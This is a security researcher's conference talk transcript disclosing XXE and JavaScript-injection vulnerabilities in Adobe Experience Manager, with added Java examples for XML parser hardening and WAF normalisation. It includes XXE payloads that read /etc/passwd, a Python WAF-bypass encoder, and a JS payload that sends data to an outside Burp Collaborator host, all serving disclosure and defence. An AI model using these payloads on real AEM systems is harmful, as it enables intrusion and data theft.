
A Hacker's perspective on AEM applications security

Mikhail Egorov
September 30, 2020

Adobe Experience Manager (AEM) is a comprehensive content management solution for building websites and managing marketing content and assets. I started to look into AEM security back in 2015. Since then I discovered and reported several server-side vulnerabilities and developed a toolset for AEM hacking to automate security testing of AEM web applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087, CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise an AEM web application.

In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.


Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE
    28th – 30th SEPTEMBER 2020
    A Hacker's perspective on AEM applications security
    Mikhail Egorov, Security researcher & bug hunter

  2. whoami
    ▪ Security researcher & full-time bug hunter
    ▪ https://bugcrowd.com/0ang3el
    ▪ https://hackerone.com/0ang3el
    ▪ Conference speaker
    ▪ https://www.slideshare.net/0ang3el
    ▪ https://speakerdeck.com/0ang3el

  3. whoami
    ▪ Toolset for AEM hacking
    ▪ https://github.com/0ang3el/aem-hacker

  4. APSB19-48
    ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
    ▪ CVE-2019-8086 / XML eXternal Entity Injection
    ▪ CVE-2019-8087 / XML eXternal Entity Injection
    ▪ CVE-2019-8088 / JavaScript Code Injection

  5. XML eXternal Entity (XXE) attacks
    ▪ Do we see the parsed XML?
    ▪ What’s allowed by the XML parser?
    ▪ General external entities
    ▪ Parameter external entities
    ▪ External DTD loading
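
The three parser capabilities listed on this slide (general external entities, parameter external entities, external DTD loading) are exactly what a server-side XML consumer has to switch off. The Java program below is an added example, not code from the talk and not AEM's own code: it builds a default JAXP DocumentBuilder beside a hardened one and feeds both a constructed document that carries a DOCTYPE with one external entity. The entity URI is a placeholder that resolves to nothing, and the class and method names are mine.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class XxeParserDemo {

    // Constructed sample: one external general entity whose URI is a
    // placeholder. A hardened parser must never reach the resolver for it.
    static final String DOC_WITH_DOCTYPE =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE data [ <!ENTITY ext SYSTEM \"file:///placeholder-do-not-resolve\"> ]>\n"
        + "<data>&ext;</data>";

    static final String PLAIN_DOC = "<?xml version=\"1.0\"?><data>hello</data>";

    /** Default JAXP settings: DOCTYPE accepted, external entities resolved. */
    static DocumentBuilder weakBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /** Hardened settings: no DOCTYPE, no external entities, no external DTD. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Rejecting any DOCTYPE outright stops classic XXE before entities exist.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for deployments where a DOCTYPE must remain allowed:
        // the three capabilities from the slide, each switched off explicitly.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Reports how a given builder treats a document, so the two can be compared. */
    static String tryParse(DocumentBuilder b, String xml) {
        try {
            Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return "parsed:" + d.getDocumentElement().getTagName();
        } catch (SAXParseException e) {
            // The hardened builder ends up here: the DOCTYPE itself is refused.
            return "rejected:" + e.getMessage();
        } catch (Exception e) {
            // The weak builder ends up here: it tried to fetch the placeholder URI.
            return "io-error:" + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("weak/plain     -> " + tryParse(weakBuilder(), PLAIN_DOC));
        System.out.println("weak/doctype   -> " + tryParse(weakBuilder(), DOC_WITH_DOCTYPE));
        System.out.println("hard/plain     -> " + tryParse(hardenedBuilder(), PLAIN_DOC));
        System.out.println("hard/doctype   -> " + tryParse(hardenedBuilder(), DOC_WITH_DOCTYPE));
    }
}
```

Run it with `javac XxeParserDemo.java && java XxeParserDemo`. On a default JDK the weak builder reaches for the placeholder URI and surfaces that as an I/O error (the same code path that reads /etc/passwd when the URI is real), while the hardened builder refuses the document as soon as it sees the DOCTYPE and still parses the plain document normally. The `disallow-doctype-decl` feature is the one that matters; the others are there for parsers or use cases where a DOCTYPE cannot be refused wholesale.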

  6. XML eXternal Entity (XXE) attacks
    ]>
    &xxe;
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync …

  7. XML eXternal Entity (XXE) attacks
    %xxe;
    ]>

  8. XML eXternal Entity (XXE) attacks

  9. CVE-2019-8086
    ▪ GuideInternalSubmitServlet
    @Service({Servlet.class})
    @Properties({@Property(
        name = "sling.servlet.resourceTypes",
        value = {"fd/af/components/guideContainer"}
    ), @Property(
        name = "sling.servlet.methods",
        value = {"POST"}
    ), @Property(
        name = "sling.servlet.selectors",
        value = {"af.internalsubmit"}
    )})
    public class GuideInternalSubmitServlet

  10. CVE-2019-8086

  11. CVE-2019-8086

  12. CVE-2019-8086
    ▪ XXE payload
    ]>
    &a;

  13. CVE-2019-8086

  14. CVE-2019-8086
    ▪ Exploitation hints
    ▪ We can JSON-encode XXE payload to bypass a WAF
    ▪ In Java we can list directory content
    ▪ /proc/self/cwd

  15. CVE-2019-8086
    ▪ JSON-encoding
    data = 'a SYSTEM "file:///etc/passwd">]>&a;'
    result = ""
    for c in data:
        # emit each character as a JSON \u00XX escape
        result = result + "\\u00%02x" % ord(c)
    print(result)
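
Slides 14 and 15 show why a filter that matches on the raw request body misses a DOCTYPE that has been JSON-escaped character by character. The Java class below is an added example, not part of the talk and not AEM's code: it ports the slide's encoder, decodes JSON string escapes the way a JSON parser would before any signature is applied, and runs the same DOCTYPE/ENTITY check over both the raw and the normalised body. The sample request body is constructed and the class and method names are mine.

```java
import java.util.regex.Pattern;

public class JsonEscapeNormalizer {

    // Markers a request inspector looks for in submitted XML. Matched
    // case-insensitively so that a lowercase doctype is flagged as well.
    static final Pattern XML_DTD_MARKERS =
        Pattern.compile("<!(DOCTYPE|ENTITY)\\b", Pattern.CASE_INSENSITIVE);

    /** Port of the slide's encoder: every character becomes a backslash-u escape. */
    static String jsonUnicodeEscape(String s) {
        StringBuilder sb = new StringBuilder();
        for (char c : s.toCharArray()) {
            sb.append(String.format("\\u%04x", (int) c));
        }
        return sb.toString();
    }

    /**
     * Decodes JSON string escapes without a JSON library: backslash-u plus four
     * hex digits, the short escapes (n, t, r, b, f) and the quoted forms
     * (backslash, double quote, slash). Malformed escapes are kept literally.
     */
    static String decodeJsonEscapes(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (c != '\\' || i + 1 >= s.length()) {
                out.append(c);
                continue;
            }
            char n = s.charAt(++i);
            switch (n) {
                case 'u': {
                    if (i + 4 < s.length()) {
                        try {
                            out.append((char) Integer.parseInt(s.substring(i + 1, i + 5), 16));
                            i += 4;
                            break;
                        } catch (NumberFormatException ignored) {
                            // not four hex digits: keep the text as it was
                        }
                    }
                    out.append("\\u");
                    break;
                }
                case 'n': out.append('\n'); break;
                case 't': out.append('\t'); break;
                case 'r': out.append('\r'); break;
                case 'b': out.append('\b'); break;
                case 'f': out.append('\f'); break;
                default:  out.append(n); // covers \" \\ and \/
            }
        }
        return out.toString();
    }

    /** Naive inspector: looks at the raw body only, which the slide's trick evades. */
    static boolean naiveFlags(String rawBody) {
        return XML_DTD_MARKERS.matcher(rawBody).find();
    }

    /** Normalising inspector: decodes the JSON escapes first, then matches. */
    static boolean normalisedFlags(String rawBody) {
        return XML_DTD_MARKERS.matcher(decodeJsonEscapes(rawBody)).find();
    }

    public static void main(String[] args) {
        // Constructed sample body: a harmless DOCTYPE fragment (no entities) hidden
        // behind per-character escapes, exactly the encoding the slide describes.
        String fragment = "<!DOCTYPE a [ ]><a>x</a>";
        String body = "{\"data\":\"" + jsonUnicodeEscape(fragment) + "\"}";
        System.out.println("encoded body:            " + body);
        System.out.println("raw body matches:        " + naiveFlags(body));
        System.out.println("normalised body matches: " + normalisedFlags(body));
    }
}
```

Run it with `javac JsonEscapeNormalizer.java && java JsonEscapeNormalizer`. The raw check reports no match because the body contains no literal `<!`, while the normalised check does match; the general lesson is that any inspection has to happen on the same representation the application will parse, so a filter in front of a JSON-accepting servlet must decode JSON before it looks for XML.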

  16. CVE-2019-8086

  17. CVE-2019-8086
    ▪ XXE payload
    ]>
    &a;

  18. CVE-2019-8086

  19. CVE-2019-8086
    ▪ Exploitation requirements
    ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
    ▪ Attacker should have a jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

  20. CVE-2019-8086
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ Only blind SSRF for some versions

  21. CVE-2019-8087
    ▪ WSDLInvokerServlet
    @Service({Servlet.class})
    @Properties({@Property(
        name = "sling.servlet.resourceTypes",
        value = {"fd/af/components/guideContainer"}
    ), @Property(
        name = "sling.servlet.selectors",
        value = {"af.wsdl"}
    ), @Property(
        name = "sling.servlet.methods",
        value = {"POST"}
    )})
    public class WSDLInvokerServlet

  22. CVE-2019-8087

  23. CVE-2019-8087

  24. CVE-2019-8087
    ▪ WSDL example
    ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

  25. CVE-2019-8087

  26. CVE-2019-8087
    ▪ Malicious xxe.wsdl
    %dtd;
    %param1;
    ]>

  27. CVE-2019-8087
    ▪ Malicious loot.dtd
    ">

  28. CVE-2019-8087

  29. CVE-2019-8087
    ▪ Exploitation requirements
    ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
    ▪ Attacker should have a jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

  30. CVE-2019-8087
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ On some AEM versions WSDLInvokerServlet is not present

  31. CVE-2019-8088
    ▪ GuideSubmitServlet
    @Service({Servlet.class})
    @Properties({@Property(
        name = "sling.servlet.resourceTypes",
        value = {"fd/af/components/guideContainer"}
    ), @Property(
        name = "sling.servlet.methods",
        value = {"POST"}
    ), @Property(
        name = "sling.servlet.selectors",
        value = {"af.submit", "af.agreement", "af.signSubmit"}
    )})
    public class GuideSubmitServlet extends SlingAllMethodsServlet {

  32. CVE-2019-8088

  33. CVE-2019-8088

  34. CVE-2019-8088

  35. CVE-2019-8088

  36. CVE-2019-8088

  37. CVE-2019-8088
    ▪ Sandboxed Rhino engine on some AEM versions
    ▪ No RCE
    ▪ Sandbox allows network interactions
    ▪ SSRF w/ ability to see the response

  38. CVE-2019-8088
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net');//

  39. CVE-2019-8088

  40. CVE-2019-8088

  41. CVE-2019-8088
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',function(data){jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',{loot:data})});//

  42. CVE-2019-8088

  43. CVE-2019-8088

  44. CVE-2019-8088
    ▪ Exploitation requirements
    ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
    ▪ Attacker should have a jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

  45. CVE-2019-8088
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ RCE or SSRF

  46. APSB19-48
    ▪ Keep AEM up to date
    ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
    ▪ Block jcr:write access for anonymous user
    ▪ /content/usergenerated/etc/commerce/smartlists/
    ▪ Remove demo content (Geometrixx, WeRetail, …)

  47. Thank you
    @0ang3el